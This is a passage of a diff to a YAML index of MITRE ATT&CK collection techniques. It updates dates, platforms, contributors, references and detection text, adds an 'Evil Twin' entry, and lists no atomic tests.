           the Comings and Goings. Retrieved November 21, 2016.'
         source_name: ESET Sednit Part 2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-25T22:48:14.605Z'
       name: Archive via Custom Method
       description: 'An adversary may compress or encrypt data that is collected prior
         to exfiltration using a custom method. Adversaries may choose to use custom
@@ -39290,22 +39763,24 @@ collection:
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Script: Script Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1114:
     technique:
-      modified: '2023-09-29T21:06:03.098Z'
+      modified: '2024-10-15T12:24:27.627Z'
       name: Email Collection
       description: 'Adversaries may target user email to collect sensitive information.
         Emails may contain sensitive data, including trade secrets or personal information,
-        that can prove valuable to adversaries. Adversaries can collect or forward
-        email from mail servers or clients. '
+        that can prove valuable to adversaries. Emails may also contain details of
+        ongoing incident response operations, which may allow adversaries to adjust
+        their techniques in order to maintain persistence or evade defenses.(Citation:
+        TrustedSec OOB Communications)(Citation: CISA AA20-352A 2021) Adversaries
+        can collect or forward email from mail servers or clients. '
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
       x_mitre_contributors:
       - Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         There are likely a variety of ways an adversary could collect email from a target, each with a different mechanism for detection.
@@ -39322,11 +39797,10 @@ collection:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Office 365
-      - Google Workspace
       - macOS
       - Linux
-      x_mitre_version: '2.5'
+      - Office Suite
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -39342,37 +39816,28 @@ collection:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1114
         external_id: T1114
+      - source_name: CISA AA20-352A 2021
+        description: CISA. (2021, April 15). Advanced Persistent Threat Compromise
+          of Government Agencies, Critical Infrastructure, and Private Sector Organizations.
+          Retrieved August 30, 2024.
+        url: https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-352a
       - source_name: Microsoft Tim McMichael Exchange Mail Forwarding 2
         description: McMichael, T.. (2015, June 8). Exchange and Office 365 Mail Forwarding.
           Retrieved October 8, 2019.
         url: https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/
+      - source_name: TrustedSec OOB Communications
+        description: 'Tyler Hudak. (2022, December 29). To OOB, or Not to OOB?: Why
+          Out-of-Band Communications are Essential for Incident Response. Retrieved
+          August 30, 2024.'
+        url: https://trustedsec.com/blog/to-oob-or-not-to-oob-why-out-of-band-communications-are-essential-for-incident-response
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1025:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - William Cain
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec
-      type: attack-pattern
-      created: '2017-05-31T21:30:31.584Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        url: https://attack.mitre.org/techniques/T1025
-        external_id: T1025
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:30:50.936Z'
       name: Data from Removable Media
       description: "Adversaries may search connected removable media on computers
         they have compromised to find files of interest. Sensitive data can be collected
@@ -39384,75 +39849,93 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - William Cain
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor processes and command-line arguments for actions
         that could be taken to collect files from a system's connected removable media.
         Remote access tools with built-in features may interact directly with the
         Windows API to gather data. Data may also be acquired through Windows system
         management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
         and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Access'
       x_mitre_system_requirements:
       - Privileges to access removable media drive and files
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec
+      created: '2017-05-31T21:30:31.584Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1025
+        external_id: T1025
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1025
     atomic_tests: []
   T1074.001:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Massimiliano Romano, BT Security
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c
-      created: '2020-03-13T21:13:10.467Z'
-      x_mitre_version: '1.1'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1074.001
-        url: https://attack.mitre.org/techniques/T1074/001
-      - source_name: Prevailion DarkWatchman 2021
-        url: https://www.prevailion.com/darkwatchman-new-fileless-techniques/
-        description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
-          new evolution in fileless techniques. Retrieved January 10, 2022.'
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-08-26T16:28:39.920Z'
+      name: 'Data Staged: Local Data Staging'
       description: |-
         Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
 
         Adversaries may also stage collected data in various available formats/locations of a system, including local storage databases/repositories or the Windows Registry.(Citation: Prevailion DarkWatchman 2021)
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Data Staged: Local Data Staging'
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Massimiliano Romano, BT Security
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
 
         Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
 
         Consider monitoring accesses and modifications to local storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: collection
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Access'
       - 'Command: Command Execution'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c
+      created: '2020-03-13T21:13:10.467Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1074/001
+        external_id: T1074.001
+      - source_name: Prevailion DarkWatchman 2021
+        description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
+          new evolution in fileless techniques. Retrieved January 10, 2022.'
+        url: https://web.archive.org/web/20220629230035/https://www.prevailion.com/darkwatchman-new-fileless-techniques/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1074.001
     atomic_tests: []
   T1114.001:
@@ -39479,7 +39962,7 @@ collection:
         url: https://support.office.com/en-us/article/introduction-to-outlook-data-files-pst-and-ost-222eaf92-a995-45d9-bde2-f331f60e2790
         description: Microsoft. (n.d.). Introduction to Outlook Data Files (.pst and
           .ost). Retrieved February 19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T17:59:20.983Z'
       name: 'Email Collection: Local Email Collection'
       description: |-
         Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.
@@ -39503,13 +39986,11 @@ collection:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1114.001
     atomic_tests: []
   T1119:
     technique:
-      modified: '2024-01-02T13:35:57.680Z'
+      modified: '2024-09-25T20:40:07.791Z'
       name: Automated Collection
       description: "Once established within a system or network, an adversary may
         use automated techniques for collecting internal data. Methods for performing
@@ -39530,6 +40011,7 @@ collection:
         phase_name: collection
       x_mitre_contributors:
       - Praetorian
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Depending on the method used, actions could include common
         file system commands and parameters on the command-line interface within batch
@@ -39553,8 +40035,10 @@ collection:
       - Windows
       - IaaS
       - SaaS
-      x_mitre_version: '1.2'
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
+      - 'User Account: User Account Authentication'
       - 'Command: Command Execution'
       - 'File: File Access'
       - 'Script: Script Execution'
@@ -39579,7 +40063,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1119
     atomic_tests: []
   T1115:
@@ -39646,12 +40129,11 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1115
     atomic_tests: []
   T1530:
     technique:
-      modified: '2023-09-29T16:11:43.530Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Data from Cloud Storage Object
       description: "Adversaries may access data from cloud storage.\n\nMany IaaS providers
         offer solutions for online data object storage such as Amazon S3, Azure Storage,
@@ -39685,10 +40167,12 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Netskope
       - Praetorian
       - AppOmni
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor for unusual queries to the cloud provider's storage
         service. Activity originating from unexpected sources may indicate improper
@@ -39699,13 +40183,14 @@ collection:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - IaaS
       - SaaS
-      - Google Workspace
-      - Office 365
-      x_mitre_version: '2.1'
+      - Office Suite
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
+      - 'Cloud Service: Cloud Service Metadata'
       - 'Cloud Storage: Cloud Storage Access'
       type: attack-pattern
       id: attack-pattern--3298ce88-1628-43b1-87d9-0b5336b193d7
@@ -39746,37 +40231,11 @@ collection:
         url: https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/a-misconfigured-amazon-s3-exposed-almost-50-thousand-pii-in-australia
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1530
     atomic_tests: []
   T1074.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - IaaS
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0
-      type: attack-pattern
-      created: '2020-03-13T21:14:58.206Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1074.002
-        url: https://attack.mitre.org/techniques/T1074/002
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-30T13:28:37.414Z'
       name: Remote Data Staging
       description: |-
         Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
@@ -39787,23 +40246,47 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
 
         Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Command: Command Execution'
       - 'File: File Access'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0
+      created: '2020-03-13T21:14:58.206Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1074/002
+        external_id: T1074.002
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1005:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-12T23:54:39.466Z'
       name: Data from Local System
       description: |
         Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
@@ -39873,7 +40356,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1005
     atomic_tests: []
   T1560.002:
@@ -39908,7 +40390,7 @@ collection:
         description: Wikipedia. (2016, March 31). List of file signatures. Retrieved
           April 22, 2016.
         source_name: Wikipedia File Header Signatures
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-29T18:27:30.891Z'
       name: 'Archive Collected Data: Archive via Library'
       description: |-
         An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including [Python](https://attack.mitre.org/techniques/T1059/006) rarfile (Citation: PyPI RAR), libzip (Citation: libzip), and zlib (Citation: Zlib Github). Most libraries include functionality to encrypt and/or compress data.
@@ -39927,10 +40409,89 @@ collection:
       x_mitre_data_sources:
       - 'Script: Script Execution'
       - 'File: File Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1560.002
     atomic_tests: []
+  T1557.004:
+    technique:
+      modified: '2024-11-11T18:52:53.686Z'
+      name: Evil Twin
+      description: "Adversaries may host seemingly genuine Wi-Fi access points to
+        deceive users into connecting to malicious networks as a way of supporting
+        follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040),
+        [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002),
+        or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia
+        ‘Evil Twin’)\n\nBy using a Service Set Identifier (SSID) of a legitimate Wi-Fi
+        network, fraudulent Wi-Fi access points may trick devices or users into connecting
+        to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium
+        evil twin)  Adversaries may provide a stronger signal strength or block access
+        to Wi-Fi access points to coerce or entice victim devices into connecting
+        to malicious networks.(Citation: specter ops evil twin)  A Wi-Fi Pineapple
+        – a network security auditing and penetration testing tool – may be deployed
+        in Evil Twin attacks for ease of use and broader range. Custom certificates
+        may be used in an attempt to intercept HTTPS traffic. \n\nSimilarly, adversaries
+        may also listen for client devices sending probe requests for known or previously
+        connected networks (Preferred Network Lists or PNLs). When a malicious access
+        point receives a probe request, adversaries can respond with the same SSID
+        to imitate the trusted, known network.(Citation: specter ops evil twin)  Victim
+        devices are led to believe the responding access point is from their PNL and
+        initiate a connection to the fraudulent network.\n\nUpon logging into the
+        malicious Wi-Fi access point, a user may be directed to a fake login page
+        or captive portal webpage to capture the victim’s credentials. Once a user
+        is logged into the fraudulent Wi-Fi network, the adversary may able to monitor
+        network activity, manipulate data, or steal additional credentials. Locations
+        with high concentrations of public Wi-Fi access, such as airports, coffee
+        shops, or libraries, may be targets for adversaries to set up illegitimate
+        Wi-Fi access points. "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Menachem Goldstein
+      - DeFord L. Smith
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Content'
+      - 'Network Traffic: Network Traffic Flow'
+      type: attack-pattern
+      id: attack-pattern--48b836c6-e4ca-435a-82a3-29c03e5b492e
+      created: '2024-09-17T14:27:40.947Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1557/004
+        external_id: T1557.004
+      - source_name: Kaspersky evil twin
+        description: AO Kaspersky Lab. (n.d.). Evil twin attacks and how to prevent
+          them. Retrieved September 17, 2024.
+        url: https://usa.kaspersky.com/resource-center/preemptive-safety/evil-twin-attacks
+      - source_name: medium evil twin
+        description: Gihan, Kavishka. (2021, August 8). Wireless Security— Evil Twin
+          Attack. Retrieved September 17, 2024.
+        url: https://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59
+      - source_name: specter ops evil twin
+        description: Ryan, Gabriel. (2019, October 28). Modern Wireless Tradecraft
+          Pt I — Basic Rogue AP Theory — Evil Twin and Karma Attacks. Retrieved September
+          17, 2024.
+        url: https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
+      - source_name: Australia ‘Evil Twin’
+        description: Toulas, Bill. (2024, July 1). Australian charged for ‘Evil Twin’
+          WiFi attack on plane. Retrieved September 17, 2024.
+        url: https://www.bleepingcomputer.com/news/security/australian-charged-for-evil-twin-wifi-attack-on-plane/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1602.002:
     technique:
       x_mitre_platforms:
@@ -39959,7 +40520,7 @@ collection:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
         description: US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted
           by Cyber Actors. Retrieved October 2, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-02-17T19:50:46.948Z'
       name: Network Device Configuration Dump
       description: "Adversaries may access network configuration files to collect
         sensitive data about the device and the network. The network configuration
@@ -39989,8 +40550,6 @@ collection:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1560:
     technique:
@@ -40044,7 +40603,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1560
     atomic_tests: []
   T1185:
@@ -40081,7 +40639,7 @@ collection:
         description: Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual.
           Retrieved May 24, 2017.
         source_name: cobaltstrike manual
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-02-25T18:58:15.229Z'
       name: Browser Session Hijacking
       description: |-
         Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.(Citation: Wikipedia Man in the Browser)
@@ -40109,12 +40667,10 @@ collection:
       - Administrator
       - SYSTEM
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1557.003:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-09-12T19:46:04.759Z'
       name: DHCP Spoofing
       description: "Adversaries may redirect network traffic to adversary-owned systems
         by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting
@@ -40151,23 +40707,23 @@ collection:
         phase_name: credential-access
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - Alex Spivakovsky, Pentera
+      - Andrew Allen, @whitehat_zero
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor network traffic for suspicious/malicious behavior
         involving DHCP, such as changes in DNS and/or gateway parameters. Additionally,
         monitor Windows logs for Event IDs (EIDs) 1341, 1342, 1020 and 1063, which
         specify that the IP allocations are low or have run out; these EIDs may indicate
         a denial of service attack.(Citation: dhcp_serv_op_events)(Citation: solution_monitor_dhcp_scopes)'
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Linux
       - Windows
       - macOS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
       x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Alex Spivakovsky, Pentera
-      - Andrew Allen, @whitehat_zero
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Application Log: Application Log Content'
@@ -40200,21 +40756,20 @@ collection:
       - source_name: solution_monitor_dhcp_scopes
         description: 'Shoemaker, E. (2015, December 31). Solution: Monitor DHCP Scopes
           and Detect Man-in-the-Middle Attacks with PRTG and PowerShell. Retrieved
-          March 7, 2022.'
-        url: https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
+          September 12, 2024.'
+        url: https://web.archive.org/web/20231202025258/https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
       - source_name: w32.tidserv.g
         description: Symantec. (2009, March 22). W32.Tidserv.G. Retrieved January
           14, 2022.
         url: https://web.archive.org/web/20150923175837/http://www.symantec.com/security_response/writeup.jsp?docid=2009-032211-2952-99&tabid=2
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1557.001:
     technique:
-      modified: '2023-04-25T14:00:00.188Z'
+      modified: '2022-10-25T15:46:55.393Z'
       name: 'Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay'
       description: "By responding to LLMNR/NBT-NS network traffic, adversaries may
         spoof an authoritative source for name resolution to force communication with
@@ -40322,12 +40877,11 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.0.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1557.001
     atomic_tests: []
   T1056.003:
     technique:
-      modified: '2023-03-30T21:01:46.711Z'
+      modified: '2024-10-15T16:43:43.849Z'
       name: Web Portal Capture
       description: |-
         Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
@@ -40338,13 +40892,13 @@ collection:
         phase_name: collection
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: File monitoring may be used to detect changes to files in
         the Web directory for organization login pages that do not match with authorized
         updates to the Web server's content.
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
@@ -40358,6 +40912,7 @@ collection:
       id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
       created: '2020-02-11T18:59:50.058Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1056/003
@@ -40368,12 +40923,12 @@ collection:
         url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1125:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-03-30T21:01:37.205Z'
       name: Video Capture
       description: |-
         An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.
@@ -40418,30 +40973,11 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
       identifier: T1125
     atomic_tests: []
   T1213.001:
     technique:
-      x_mitre_platforms:
-      - SaaS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc
-      type: attack-pattern
-      created: '2020-02-14T13:09:51.004Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1213.001
-        url: https://attack.mitre.org/techniques/T1213/001
-      - url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
-        description: Atlassian. (2018, January 9). How to Enable User Access Logging.
-          Retrieved April 4, 2018.
-        source_name: Atlassian Confluence Logging
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-30T13:45:42.840Z'
